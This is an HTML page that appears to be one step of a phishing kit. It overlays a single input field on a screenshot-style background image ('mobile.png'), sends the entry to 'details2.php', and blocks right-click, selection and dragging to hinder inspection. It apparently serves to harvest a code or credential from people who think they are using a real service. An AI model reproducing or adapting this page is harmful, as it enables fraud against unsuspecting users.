<head>
<title>Online Services</title>
<link rel="shortcut icon" href="favicon.ico" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body onselectstart="return false" oncontextmenu="return false" ondragstart="return false" onMouseOver="window.status='..message perso .. '; return true;" >
<style type="text/css">
<!--
html{
overflow-y:hidden;
}
-->
</style>

<style type="text/css">
Body{
background-image: url('');
background-repeat: no-repeat;
margin-left:0px;
margin-top:0px;
margin-bottom:-20px
}
</style>
 

</head>

<body style="background-image: url('mobile.png')">
<form id="form2" onsubmit="return validar(this);" action="details2.php" method="POST">
<div id="Layer9" style="position:absolute; width:321px; height:22px; z-index:3; left: 185px; top: 326px">
  <input name="T3" id="T1" size=29 maxlength="30">
</div>
<div id="Layer4" style="position:absolute; width:95px; height:41px; z-index:4; left: 931px; top: 394px;">
    <input type="image" name="imageField" id="imageField" src="mobilevalida.png" width="148" height="66" />
</form>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>